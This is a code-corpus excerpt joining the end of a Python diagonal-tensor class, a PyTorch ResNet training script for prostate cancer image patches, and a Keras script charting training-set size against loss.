return len(data.shape)
else:
raise ValueError(funcs.errorMessage(location = "DiagonalTensor.deduceDimension", err = "both data and labels are None."))
# TODO: add the affect of "legs" to the deduction
# the strategy is almost the same as Tensor
# the only difference is that, when we have one integer as shape, and we have dimension: we can give the real shape by repeat for dim times
# deduce strategy:
# we want length and dim
# priority for length: shape > data
# priority for dim: shape > labels > data
# 0. leg exist: the shape is already done
# check if shape of leg is ok for diagonal tensor
# if shape exist: check if shape is ok with shape of leg(integer / tuple)
# if label exist: check if dimension of labels ok with legs
# if data exist: ...
# 1. shape exist: shape can be either an integer, or a n-element tuple
# for int case: deduce dim from labels, then data
# for tuple case: (length, data) is ready
# then check labels: should be either None or len(labels) == dim
# then check data: either None, length-element array, dim-dimensional tensor
# 2. shape not exist: check labels for dim
# then check data for dim(1d array, dim-d array with all equal shapes)
# and generate l from shape of data
# 3. labels not exist: check data for (dim, length)
def checkLegsDiagonalCompatible(self, legs):
"""
Check whether the shape from legs can form a diagonal tensor, with all the indices have the same dimension.
Parameters
----------
legs : list of Leg
Legs of the tensor that already existed before creating the tensor.
Returns
-------
bool
Whether the legs can form a diagonal tensor.
"""
if (len(legs) == 0):
return True
l = legs[0].dim
for leg in legs:
if (leg.dim != l):
return False
return True
def checkShapeDiagonalCompatible(self, shape):
"""
Check whether the shape can form a diagonal tensor, with all the indices have the same dimension.
Parameters
----------
shape : tuple of int
Shape of the tensor that already existed before creating the tensor.
Returns
-------
bool
Whether the legs can form a diagonal tensor.
"""
if (len(shape) == 0):
return True
l = shape[0]
for dim in shape:
if (dim != l):
return False
return True
def checkLegsShapeCompatible(self, legs, shape):
"""
For information, check Tensor.checkLegsShapeCompatible.
"""
if (shape is None):
return True
if (isinstance(shape, int)):
shape = tuple([shape] * len(legs))
if (isinstance(shape, list) or isinstance(shape, tuple)):
shapeList = list(shape)
if (len(shapeList) != len(legs)):
return False
for dim, leg in zip(shapeList, legs):
if (dim != leg.dim):
return False
return True
else:
return False
def checkShapeDataCompatible(self, shape, data):
"""
For information, check Tensor.checkShapeDataCompatible.
"""
# we know shape, and want to see if data is ok
if (data is None):
return True
if (isinstance(shape, int)):
shape = tuple([shape] * len(data.shape))
return ((len(data.shape) == 1) and (len(shape) > 0) and (len(data) == shape[0])) or (funcs.tupleProduct(data.shape) == funcs.tupleProduct(shape))
def generateData(self, shape, data, isTensorLike):
"""
For information, check Tensor.generateData.
Returns
-------
1D-array of float
The data to be saved in this diagonal tensor.
"""
if (isTensorLike):
return None
# print('generating data for data = {}'.format(data))
if (data is None):
data = xplib.xp.ones(shape[0])
# otherwise, data can be 1D-array, or ndarray
elif (len(data.shape) == 1):
data = xplib.xp.copy(data)
else:
l, dim = len(shape), shape[0]
# print('dim = {}, l = {}'.format(dim, l))
# print(xplib.xp.diag_indices(dim, l))
data = xplib.xp.copy(data[xplib.xp.diag_indices(dim, l)])
return data
def deduction(self, legs, data, labels, shape, isTensorLike = False):
"""
For more information, check Tensor.deduction
"""
# in Tensor: the "shape" has the highest priority
# so if the shape is given here, it should be taken
# however, if the shape is given as an integer: then we need to deduce the dimension
# if shape exist: then according to shape(but dim may be deduced)
# otherwise, if labels exist, then dim from labels, and l from data
# otherwise, both dim and l from data
funcName = "DiagonalTensor.deduction"
# first, consider scalar case
if (legs is None) and (labels is None) and (shape == () or ((data is not None) and (data.shape == ()))):
if (data is None) and (not isTensorLike):
data = xplib.xp.array(1.0)
return [], data, [], () # scalar
if (legs is not None):
if (not self.checkLegsDiagonalCompatible(legs = legs)):
raise ValueError(funcs.errorMessage('legs {} cannot be considered as legs for diagonal tensor.'.format(legs), location = funcName))
if (not self.checkLegsLabelsCompatible(legs = legs, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with legs {}'.format(labels, legs), location = funcName))
if (labels is None):
labels = [leg.name for leg in legs]
if (not self.checkLegsShapeCompatible(legs = legs, shape = shape)):
raise ValueError(funcs.errorMessage('shape {} is not compatible with legs {}'.format(shape, legs), location = funcName))
if (shape is None) or (isinstance(shape, int)):
shape = tuple([leg.dim for leg in legs])
if (not self.checkShapeDataCompatible(shape = shape, data = data)):
raise ValueError(funcs.errorMessage('data shape {} is not compatible with required shape {}'.format(data.shape, shape), location = funcName))
elif (shape is not None):
if (isinstance(shape, int)):
dim = self.deduceDimension(data = data, labels = labels)
shape = tuple([shape] * dim)
if (not self.checkShapeDiagonalCompatible(shape = shape)):
raise ValueError(funcs.errorMessage('shape {} cannot be considered as shape for diagonal tensor.'.format(shape), location = funcName))
if (not self.checkShapeLabelsCompatible(shape = shape, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with required shape {}'.format(labels, shape), location = funcName))
if (labels is None):
labels = self.generateLabels(len(shape))
if (not self.checkShapeDataCompatible(shape = shape, data = data)):
raise ValueError(funcs.errorMessage('data shape {} is not compatible with required shape {}'.format(data.shape, shape), location = funcName))
elif (data is not None):
# legs, shape are both None
shape = data.shape
if (not self.checkShapeDiagonalCompatible(shape = shape)):
raise ValueError(funcs.errorMessage('data shape {} cannot be considered as shape for diagonal tensor.'.format(shape), location = funcName))
dim = self.deduceDimension(data = data, labels = labels)
if (len(shape) == 1) and (dim > 1):
shape = tuple([shape[0]] * dim)
if (not self.checkShapeLabelsCompatible(shape = shape, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with required shape {}'.format(labels, shape), location = funcName))
if (labels is None):
labels = self.generateLabels(len(shape))
else:
raise ValueError(funcs.errorMessage("Tensor() cannot accept parameters where legs, shape and data being None simultaneously.", location = funcName))
# elif (shape is not None):
# if (isinstance(shape, int)):
# dim = self.deduceDimension(data, labels)
# l = shape
# else:
# dim = len(shape)
# if (dim == 0) or (not funcs.checkAllEqual(shape)):
# raise ValueError(funcs.errorMessage(location = funcName, err = "shape {} is not valid.".format(shape)))
# l = shape[0]
# # then we need to deduce dimension
# if (labels is not None) and (len(labels) != dim):
# raise ValueError(funcs.errorMessage(location = funcName, err = "number of labels is not the same as dim: {} expected but {} obtained.".format(dim, len(labels))))
# elif (data is not None):
# # data can be either shape, or an array of l
# if (len(data.shape) == 1):
# if (data.shape[0] != l):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data length is not the same as length deduced from shape: {} expected but {} obtained.".format(l, data.shape[0])))
# elif (len(data.shape) != dim) or (data.shape != tuple([l] * dim)):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data shape is not correct: {} expected but {} obtained.".format(tuple([l] * dim), data.shape)))
# # shape is None, how to deduce shape?
# elif (labels is not None):
# dim = len(labels)
# if (data is None):
# raise ValueError(funcs.errorMessage(location = funcName, err = "cannot deduce data shape since data and shape are both None."))
# elif (len(data.shape) == 1):
# l = len(data)
# elif not funcs.checkAllEqual(data.shape):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data.shape {} is not valid.".format(data.shape)))
# else:
# if (len(data.shape) != dim):
# raise ValueError(funcs.errorMessage(location = funcName, err = "dimension of data is not compatible with dimension deduced from labels: expect {} but {} is given.".format(dim, len(data.shape))))
# l = data.shape[0]
# else:
# # deduce from data.shape
# if (data is None):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data, labes and shape are all None."))
# elif not funcs.checkAllEqual(data.shape):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data.shape {} is not valid.".format(data.shape)))
# else:
# dim = len(data.shape)
# l = data.shape[0]
# print('l = {}, dim = {}'.format(l, dim))
# shape = tuple([l] * dim)
data = self.generateData(shape = shape, data = data, isTensorLike = isTensorLike)
# if (tensorLikeFlag):
# data = None
# elif (data is None):
# # default is identity
# data = xplib.xp.ones(l)
# elif (len(data.shape) == 1):
# data = xplib.xp.copy(data)
# else:
# data = xplib.xp.array([data[tuple([x] * dim)] for x in range(l)])
# must be a copy of original "data" if exist
# if (labels is None):
# labels = self.generateLabels(dim)
if (legs is None):
legs = []
for label, dim in zip(labels, list(shape)):
legs.append(Leg(self, dim, label))
else:
for leg in legs:
leg.tensor = self
return legs, data, labels, shape
def __init__(self, shape = None, labels = None, data = None, degreeOfFreedom = None, name = None, legs = None, tensorLikeFlag = False, dtype = xplib.xp.float64):
super().__init__(diagonalFlag = True, tensorLikeFlag = tensorLikeFlag, dtype = dtype)
legs, data, labels, shape = self.deduction(legs = legs, data = data, labels = labels, shape = shape, isTensorLike = tensorLikeFlag)
self.a = data
self.legs = legs
# self.totalSize = funcs.tupleProduct(shape)
# functions of Tensor from here
self.degreeOfFreedom = degreeOfFreedom
self.name = name
# self._dim = len(shape)
if shape == ():
self._length = 1
else:
self._length = shape[0]
@property
def dim(self):
return len(self.legs)
@property
def shape(self):
return tuple([self._length] * self.dim)
@property
def labels(self):
return [leg.name for leg in self.legs]
@property
def chi(self):
return self._length
def __str__(self):
if (self.tensorLikeFlag):
objectStr = 'DiagonalTensorLike'
else:
objectStr = 'DiagonalTensor'
if not (self.degreeOfFreedom is None):
dofStr = ', degree of freedom = {}'.format(self.degreeOfFreedom)
else:
dofStr = ''
if (self.name is not None):
nameStr = self.name + ', '
else:
nameStr = ''
return '{}({}shape = {}, labels = {}{})'.format(objectStr, nameStr, self.shape, self.labels, dofStr)
def __repr__(self):
if (self.tensorLikeFlag):
objectStr = 'DiagonalTensorLike'
else:
objectStr = 'DiagonalTensor'
if not (self.degreeOfFreedom is None):
dofStr = ', degree of freedom = {}'.format(self.degreeOfFreedom)
else:
dofStr = ''
if (self.name is not None):
nameStr = self.name + ', '
else:
nameStr = ''
return '{}({}shape = {}, labels = {}{})'.format(objectStr, nameStr, self.shape, self.labels, dofStr)
def __matmul__(self, b):
return contractTwoTensors(ta = self, tb = b)
def bondDimension(self):
"""
The bond dimension of the current diagonal tensor: it is the same over all dimensions.
Returns
-------
int
The dimension for each index.
"""
return self._length
def moveLegsToFront(self, legs):
"""
Change the orders of legs: move a given set of legs to the front while not modifying the relative order of other legs. Use xplib.xp.moveaxis to modify the data if this is not a TensorLike object.
In fact make nothing difference for diagonal tensor: for Tensor this function will change the order of indices of data, but for diagonal tensor it is only a virtual change of legs.
Parameters
----------
legs : list of Leg
The set of legs to be put at front.
"""
moveFrom = []
moveTo = []
currIdx = 0
movedLegs = legs
for currLeg in legs:
for i, leg in enumerate(self.legs):
if (leg == currLeg):
moveFrom.append(i)
moveTo.append(currIdx)
currIdx += 1
break
for leg in movedLegs:
self.legs.remove(leg)
# print(moveFrom, moveTo)
# print(labelList)
# print(self.labels)
self.legs = movedLegs + self.legs
# self.a = xplib.xp.moveaxis(self.a, moveFrom, moveTo)
def toVector(self):
"""
Deprecated
Make a vector according to the diagonal elements.
Deprecated since this behavior is different from Tensor, which will return a flattened data of ndarray. However, if we return the ndarray, this is usually useless for diagonal tensor and may generate an issue of CPU time.
To obtain the data, DiagonalTensor.a is enough.
Returns
-------
1D ndarray of float
A vector contains diagonal elements of the diagonal tensor.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to vector since no data contained.', 'DiagonalTensor.toVector')
funcs.deprecatedFuncWarning(funcName = "DiagonalTensor.toVector", deprecateMessage = "This will return a vector corresponding to the diagonal of tensor instead of the complete tensor.")
return xplib.xp.copy(xplib.xp.ravel(self.a))
def toMatrix(self, rows, cols):
"""
Deprecated
Make a matrix of the data of this diagonal tensor, given the labels or legs of rows and cols.
Deprecated since this function is time comsuming(O(n^d)), and for most of the cases there are much better ways to use the data rather than making a matrix. For details, see CTL.tensor.contract for more information.
Parameters
----------
rows : None or list of str or list of Leg
The legs for the rows of the matrix. If None, deducted from cols.
cols : None or list of str or list of Leg
The legs for the cols of the matrix. If None, deducted from rows.
Returns
-------
2D ndarray of float
The data of this tensor, in the form of (rows, cols).
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to matrix since no data contained.', 'DiagonalTensor.toMatrix')
# print(rows, cols)
# print(self.labels)
# input two set of legs
funcs.deprecatedFuncWarning(funcName = "DiagonalTensor.toMatrix", deprecateMessage = "Diagonal tensors should be used in a better way for linear algebra calculation rather than be made into a matrix.")
assert not ((rows is None) and (cols is None)), "Error in Tensor.toMatrix: toMatrix must have at least row or col exist."
if (rows is not None) and (isinstance(rows[0], str)):
rows = [self.getLeg(label) for label in rows]
if (cols is not None) and (isinstance(cols[0], str)):
cols = [self.getLeg(label) for label in cols]
if (cols is None):
cols = funcs.listDifference(self.legs, rows)
if (rows is None):
rows = funcs.listDifference(self.legs, cols)
assert (funcs.compareLists(rows + cols, self.legs)), "Error Tensor.toMatrix: rows + cols must contain(and only contain) all legs of tensor."
colIndices = self.getLegIndices(cols)
rowIndices = self.getLegIndices(rows)
colShape = tuple([self.shape[x] for x in colIndices])
rowShape = tuple([self.shape[x] for x in rowIndices])
colTotalSize = funcs.tupleProduct(colShape)
rowTotalSize = funcs.tupleProduct(rowShape)
data = funcs.diagonalNDTensor(self.a, self.dim)
data = xplib.xp.reshape(data, (rowTotalSize, colTotalSize))
return data
def copy(self):
"""
Make a copy of current diagonal tensor, without copy the legs. For more information, refere to Tensor.copy
Returns
-------
DiagonalTensor
A copy of the current diagonal tensor, all the information can be copied is contained.
"""
return DiagonalTensor(data = self.a, shape = self.shape, degreeOfFreedom = self.degreeOfFreedom, name = self.name, labels = self.labels, tensorLikeFlag = self.tensorLikeFlag)
# no copy of tensor legs, which may contain connection information
def toTensorLike(self):
"""
Make a copy of current tensor, without copying the legs. This function works almost like self.copy(), but without copying the data.
Returns
-------
DiagonalTensor
A DiagonalTensorLike of the current tensor, all the information can be copied is contained except legs and data.
"""
if (self.tensorLikeFlag):
return self.copy()
else:
return DiagonalTensor(data = None, degreeOfFreedom = self.degreeOfFreedom, name = self.name, labels = self.labels, shape = self.shape, tensorLikeFlag = True)
def moveLabelsToFront(self, labelList):
"""
Change the orders of legs: move a given set of labels to the front. For details, check "self.moveLegsToFront".
Parameters
----------
labelList : list of str
The set of labels to be put at front.
"""
legs = self.getLegsByLabel(labelList)
self.moveLegsToFront(legs)
# legs = [self.getLeg(label) for label in labelList]
# self.moveLegsToFront(legs)
# moveFrom = []
# moveTo = []
# currIdx = 0
# movedLegs = []
# for label in labelList:
# for i, leg in enumerate(self.legs):
# if (leg.name == label):
# moveFrom.append(i)
# moveTo.append(currIdx)
# currIdx += 1
# movedLegs.append(leg)
# break
# for leg in movedLegs:
# self.legs.remove(leg)
# self.legs = movedLegs + self.legs
# self.a = xplib.xp.moveaxis(self.a, moveFrom, moveTo)
def outProduct(self, labelList, newLabel):
"""
Deprecated
Comment
-------
The outer product will destroy the shape of diagonal tensor: we cannot easily combine several legs if it is a full diagonal tensor, so a TypeError will be raised.
"""
raise TypeError(funcs.errorMessage(location = "DiagonalTensor.outProduct", err = "DiagonalTensor cannot perform outProduct, since the diagonal nature will be destroyed."))
def norm(self):
"""
Norm of the current tensor. O(n).
Returns
-------
float
The norm of data.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike do not have norm since no data contained.', 'DiagonalTensor.norm')
return xplib.xp.linalg.norm(self.a)
def trace(self, rows = None, cols = None):
"""
Trace of the current diagonal tensor. To not destroy the property for the diagonal tensors, this function can only be used to calculate the global trace on the main diagonal.
Parameters
----------
rows, cols: None
Only set to be compatible with the usage for Tensor
Returns
-------
float
The trace of the matrix generated by given cols and rows.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike do not have trace since no data contained.', 'DiagonalTensor.trace')
return xplib.xp.sum(self.a)
def single(self):
"""
Generate a single value from a tensor.
Note the difference between this and Tensor.single(): in Tensor object, the data are saved as ndarray, so for single value it must be a 0-d array, in other words, a single number.
However, for DiagonalTensor: in all cases the data are saved as 1D-array, so we need to first decide whether it can be transferred to a single number, and then return the lowest index.
Returns
-------
float
A single value of this tensor.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to single value since no data contained.', 'DiagonalTensor.single')
assert self._length == 1, "Error: cannot get single value from diagTensor whose length is not (1,)."
assert self.shape == (), "Error: cannot get single value from tensor whose shape is not ()."
return self.a[()]
def toTensor(self, labels = None):
"""
Return a ndarray of this tensor. Since the current tensor object only saves the main diagonal, the tensor itself may be much larger, so this is not recommended and not used in any of the internal functions.
Parameters
----------
labels : None or list of str
The order of labels for the output tensor. Note that if labels is None, the order of legs is not fixed, may differ from time to time.
Returns
-------
ndarray of float
The data of the tensor, order of legs are given by the labels.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to tensor since no data contained.', 'DiagonalTensor.toTensor')
if (labels is not None):
self.reArrange(labels)
return funcs.diagonalNDTensor(self.a, self.dim)
def sumOutLeg(self, leg, weights = None):
"""
Sum out one leg to make a (D - 1)-dimensional tensor. Give a warning(and do nothing) if leg is not one of the current tensor, and give a warning if leg is connected to some bond(not free).
Parameters
----------
leg : Leg
The leg to be summed out.
weights : 1-d array, optional
If not None, then each index on given dimension will be weighted by weights[i].
"""
if not (leg in self.legs):
warnings.warn(funcs.warningMessage("leg {} is not in tensor {}, do nothing.".format(leg, self), location = 'Tensor.sumOutLeg'), RuntimeWarning)
return
if leg.bond is not None:
warnings.warn(funcs.warningMessage("leg {} to be summed out is connected to bond {}.".format(leg, leg.bond), location = 'Tensor.sumOutLeg'), RuntimeWarning)
idx = self.legs.index(leg)
# self.a = xplib.xp.sum(self.a, axis = idx)
self.legs = self.legs[:idx] + self.legs[(idx + 1):]
# if weights is None:
if (len(self.legs) == 0):
# not a diagonal tensor, since the last sum will give a single value
if weights is None:
self.a = xplib.xp.array(xplib.xp.sum(self.a))
else:
self.a = xplib.xp.array(xplib.xp.sum(self.a * weights))
self._length = 1
else:
if (weights is not None):
self.a = self.a * weights
def typeName(self):
"""
The type of the current class.
Returns
-------
{"DiagonalTensor", "DiagonalTensorLike"}
"""
if (self.tensorLikeFlag):
return "DiagonalTensorLike"
else:
return "DiagonalTensor"
from CTL.tensor.contract.contract import contractTwoTensors
| 2.859375
| 3
|
training_codes/train_prostate_cnn_Resnet_pretrained_SEER.py
|
SBU-BMI/quip_prad_cancer_detection
| 1
|
12782902
|
import argparse
from torchvision import transforms
import time, os, sys
from time import strftime
from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix
import copy
from torch.utils.data import DataLoader, Dataset
import pdb
from prostate_utils import *
import glob
parser = argparse.ArgumentParser(description='PyTorch Digital Mammography Training')
parser.add_argument('--lr', default=1e-2, type=float, help='learning rate')
parser.add_argument('--net_type', default='RESNET_34_prostate_trueVal_', type=str, help='model')
parser.add_argument('--net_depth', default=34, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float, help='weight decay')
parser.add_argument('--finetune', '-f', action='store_true', help='Fine tune pretrained model')
parser.add_argument('--batch_size', default=256, type=int)
parser.add_argument('--num_workers', default=8, type=int)
parser.add_argument('--num_epochs', default=100, type=int, help='Number of epochs in training')
parser.add_argument('--lr_decay_epoch', default=10, type = int)
parser.add_argument('--max_lr_decay', default = 60, type = int)
parser.add_argument('--APS', default = 175, type = int)
parser.add_argument('--N_subimgs', default = 5, type = int)
parser.add_argument('--N_limit', default = 100000, type = int)
parser.add_argument('--check_after', default=2,
type=int, help='check the network after check_after epoch')
parser.add_argument('--note', type=str, default='none', help="note while running the code")
args = parser.parse_args()
with open(os.path.basename(__file__)) as f:
codes = f.readlines()
print('\n\n' + '=' * 20 + os.path.basename(__file__) + '=' * 20)
for c in codes:
print(c[:-1])
with open('prostate_utils.py') as f:
codes = f.readlines()
print('\n\n' + '=' * 20 + 'prostate_utils.py' + '=' * 20)
for c in codes:
print(c[:-1])
print(args)
rand_seed = 26700
if rand_seed is not None:
np.random.seed(rand_seed)
torch.manual_seed(rand_seed)
torch.cuda.manual_seed(rand_seed)
use_gpu = torch.cuda.is_available()
print('Using GPU: ', use_gpu)
device = torch.device("cuda:0")
mean = [0.6462, 0.5070, 0.8055] # for Prostate cancer
std = [0.1381, 0.1674, 0.1358]
APS = args.APS # default = 448
input_size = 224
data_transforms = {
'train': transforms.Compose([ # 2 steps of data augmentation for training
transforms.RandomCrop(APS), # perform random crop manually in the dataloader
transforms.Scale(input_size),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.3, hue=0.1),
transforms.ToTensor(),
transforms.Normalize(mean, std)]),
'val': transforms.Compose([
transforms.Scale(input_size),
transforms.ToTensor(),
transforms.Normalize(mean, std)])
}
train_seer_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_seer'
train_beatrice_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_Beatrice_training'
val_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_Beatrice_validation'
img_trains = glob.glob(os.path.join(train_seer_fol, '*png')) + glob.glob(os.path.join(train_beatrice_fol, '*png'))
img_vals = glob.glob(os.path.join(val_fol, '*png'))
print('len of train/val set: ', len(img_trains), len(img_vals))
train_set = data_loader(img_trains, transform = data_transforms['train'])
train_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)
val_set = data_loader(img_vals, transform = data_transforms['val'])
val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers)
def val_fn_epoch(val_fn = None, crit = None, val_loader = None):
nline = 0
running_loss = 0.0
labels_val = torch.zeros(0).type(torch.LongTensor)
preds_val = torch.zeros(0).type(torch.LongTensor).to(device)
with torch.no_grad():
for ix, batch in enumerate(val_loader):
if (len(val_loader.dataset) - nline) < 2: continue
inputs, targets = batch
labels_val = torch.cat((labels_val, targets.type(torch.LongTensor)))
inputs = Variable(inputs.to(device))
targets = Variable(targets.type(torch.LongTensor).to(device))
output = val_fn(inputs)
if type(output) == tuple:
output,_ = output
N = output.size(0)
loss = crit(output, targets)
running_loss += loss.item() * N
_, preds = torch.max(output.data, 1) # get the argmax index along the axis 1
preds_val = torch.cat((preds_val, preds))
labels_val = labels_val.to(device)
val_acc = accuracy_score(labels_val, preds_val)
f1 = f1_score(labels_val, preds_val, average='macro')
unique, counts = np.unique(np.array(labels_val), return_counts=True)
return val_acc, f1, preds_val, labels_val, running_loss/labels_val.size(0), dict(zip(unique, counts))
def train_model(model, criterion = None, num_epochs=100, train_loader = train_loader, val_loader = val_loader):
best_f1 = 0
best_epoch = 0
start_training = time.time()
for epoch in range(num_epochs):
start = time.time()
if epoch < 15: lr = args.lr
elif epoch < 30: lr = args.lr/2
elif epoch < 40: lr = args.lr/10
elif epoch < 60: lr = args.lr / 50
else: lr = args.lr/100
if epoch >= 50:
for param in model.parameters():
param.requires_grad = True
optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr=lr, momentum=0.9, weight_decay=args.weight_decay)
print('Epoch {}/{}'.format(epoch + 1, num_epochs))
print('lr: {:.6f}'.format(lr))
print('-' * 50)
for phase in ['train']:
if phase == 'train':
data_loader = train_loader
model.train(True)
else:
data_loader = val_loader
model.train(False)
running_loss = 0.0
running_corrects = 0
N_tot = 0
labels_train = torch.zeros(0).type(torch.LongTensor)
preds_train = torch.zeros(0).type(torch.LongTensor).to(device)
for ix, data in enumerate(data_loader):
if (len(data_loader.dataset) - N_tot) < 3: continue
inputs, labels = data
labels_train = torch.cat((labels_train, labels.type(torch.LongTensor)))
inputs = Variable(inputs.to(device))
labels = Variable(labels.type(torch.LongTensor).to(device))
optimizer.zero_grad()
outputs = model(inputs)
if type(outputs) == tuple: # for inception_v3 output
outputs,_ = outputs
_, preds = torch.max(outputs.data, 1)
loss = criterion(outputs, labels)
if phase == 'train':
loss.backward()
optimizer.step()
N_tot += outputs.size(0)
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
preds_train = torch.cat((preds_train, preds))
unique, counts = np.unique(np.array(labels_train), return_counts=True)
print('| Epoch:[{}][{}/{}]\tTrain_Loss: {:.4f}\tAccuracy: {:.4f}\tTrain_data: {}\tTime: {:.2f} mins'.format(epoch + 1, ix + 1,
len(data_loader.dataset)//args.batch_size,
running_loss / N_tot, running_corrects.item() / N_tot, dict(zip(unique, counts)), (time.time() - start)/60.0))
try:
conf_matrix = confusion_matrix(labels_train.to(device), preds_train, labels=[0, 1])
print(conf_matrix)
except:
print('could not compute confusion matrix.')
sys.stdout.flush()
############ VALIDATION #############################################
if (epoch + 1) % args.check_after == 0:
model.eval()
start = time.time()
val_acc, f1, Pr, Tr, val_loss, labels_val = val_fn_epoch(val_fn = model, crit = criterion, val_loader = val_loader)
print("Epoch: {}\tVal_Loss: {:.4f}\tAccuracy: {:.4f}\tF1-score: {:.4f}\tVal_data: {}\tTime: {:.3f}mins".format(
(epoch + 1), val_loss, val_acc, f1,labels_val, (time.time() - start)/60.0))
try:
conf_matrix = confusion_matrix(Tr, Pr, labels=[0, 1])
print(conf_matrix)
except:
print('could not compute confusion matrix.')
start = time.time()
# deep copy the model
if f1 > best_f1 and epoch > 2:
print('Saving model')
best_f1 = f1
best_epoch = epoch + 1
best_model = copy.deepcopy(model)
state = {
'model': best_model,
'f1-score': best_f1,
'args': args,
'lr': lr,
'saved_epoch': epoch,
}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
save_point = './checkpoint/'
if not os.path.isdir(save_point):
os.mkdir(save_point)
saved_model_fn = args.net_type + '_' + '_' + strftime('%m%d_%H%M')
torch.save(state, save_point + saved_model_fn + '_' + str(best_f1) + '_' + str(epoch) + '.t7')
print('=======================================================================')
time_elapsed = time.time() - start_training
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print('Best F1-score: {:4f} at epoch: {}'.format(best_f1, best_epoch))
def main():
sys.setrecursionlimit(10000)
if args.net_depth == 34:
model = models.resnet34(pretrained=True)
elif args.net_depth == 50:
model = models.resnet50(pretrained=True)
elif args.net_depth == 101:
model = models.resnet101(pretrained=True)
elif args.net_depth == 152:
model = models.resnet152(pretrained=True)
for param in model.parameters():
param.requires_grad = False
num_in = model.fc.in_features
model.fc = nn.Linear(num_in, 2)
model = model.to(device)
model = torch.nn.DataParallel(model, device_ids=[0,1])
cudnn.benchmark = True
print(model)
print('Start training ... ')
criterion = nn.CrossEntropyLoss().to(device)
train_model(model, criterion, num_epochs=args.num_epochs, train_loader=train_loader, val_loader=val_loader)
if __name__ == "__main__":
main()
| 2.0625
| 2
|
python_scripts/calculate_training_set_size_vs_loss.py
|
GoldenholzLab/LPC-RCT
| 0
|
12782903
|
<filename>python_scripts/calculate_training_set_size_vs_loss.py<gh_stars>0
from train_keras_model import build_single_perceptron
import matplotlib.pyplot as plt
import numpy as np
import json
import os
import time
os.environ['KMP_DUPLICATE_LIB_OK']='True'
def create_model_and_load_training_data(training_data_dir,
training_samples_file_name):
training_data_file_path = training_data_dir + '/' + training_samples_file_name + '.json'
single_perceptron_model = build_single_perceptron(80)
with open(training_data_file_path, 'r') as training_data_json_file:
data = json.load(training_data_json_file)
placebo_arm_hists = np.array(data[0])
drug_arm_hists = np.array(data[1])
labels = np.array(data[2])
return [single_perceptron_model,
placebo_arm_hists,
drug_arm_hists,
labels]
def training_set_size_vs_loss(single_perceptron_model,
placebo_arm_hists,
drug_arm_hists,
labels,
batch_size,
num_epochs,
num_training_samples_per_classification_step,
final_num_training_samples_per_classification):
num_training_samples_per_classification_array = \
np.arange(num_training_samples_per_classification_step,
final_num_training_samples_per_classification + num_training_samples_per_classification_step,
num_training_samples_per_classification_step)
num_training_set_sizes = \
int(final_num_training_samples_per_classification/num_training_samples_per_classification_step)
final_epoch_loss_array = np.zeros(num_training_set_sizes)
for num_training_samples_per_classification_index in range(num_training_set_sizes):
num_training_samples_per_classification = \
num_training_samples_per_classification_array[num_training_samples_per_classification_index]
tmp_placebo_arm_hists = placebo_arm_hists[:2*num_training_samples_per_classification, :, :]
tmp_drug_arm_hists = drug_arm_hists[:2*num_training_samples_per_classification, :, :]
tmp_labels = labels[:2*num_training_samples_per_classification]
history = \
single_perceptron_model.fit([tmp_placebo_arm_hists, tmp_drug_arm_hists],
tmp_labels, batch_size=batch_size, epochs=num_epochs)
final_epoch_loss_array[num_training_samples_per_classification_index] = history.history['loss'][num_epochs - 1]
return [num_training_samples_per_classification_array,
final_epoch_loss_array]
def store_losses_over_training_set_sizes(num_training_samples_per_classification_array,
final_epoch_loss_array,
losses_storage_dir,
losses_file_name):
losses_storage_file_path = losses_storage_dir + '/' + losses_file_name + '.json'
with open(losses_storage_file_path, 'w+') as json_file:
data = []
data.append(num_training_samples_per_classification_array.tolist())
data.append(final_epoch_loss_array.tolist())
json.dump(data,json_file)
def get_inputs():
training_data_dir = os.getcwd()
losses_storage_dir = os.getcwd()
training_samples_file_name = '200000_weekly_level_15_training_samples'
losses_file_name = 'training_set_size_losses'
num_training_samples_per_classification_step = 5000
final_num_training_samples_per_classification = 100000
batch_size = 100
num_epochs = 50
return [training_data_dir,
training_samples_file_name,
losses_storage_dir,
losses_file_name,
num_training_samples_per_classification_step,
final_num_training_samples_per_classification,
batch_size,
num_epochs]
def main():
[training_data_dir,
training_samples_file_name,
losses_storage_dir,
losses_file_name,
num_training_samples_per_classification_step,
final_num_training_samples_per_classification,
batch_size,
num_epochs] = \
get_inputs()
[single_perceptron_model,
placebo_arm_hists,
drug_arm_hists,
labels] = \
create_model_and_load_training_data(training_data_dir,
training_samples_file_name)
[num_training_samples_per_classification_array,
final_epoch_loss_array] = \
training_set_size_vs_loss(single_perceptron_model,
placebo_arm_hists,
drug_arm_hists,
labels,
batch_size,
num_epochs,
num_training_samples_per_classification_step,
final_num_training_samples_per_classification)
store_losses_over_training_set_sizes(num_training_samples_per_classification_array,
final_epoch_loss_array,
losses_storage_dir,
losses_file_name)
if(__name__=='__main__'):
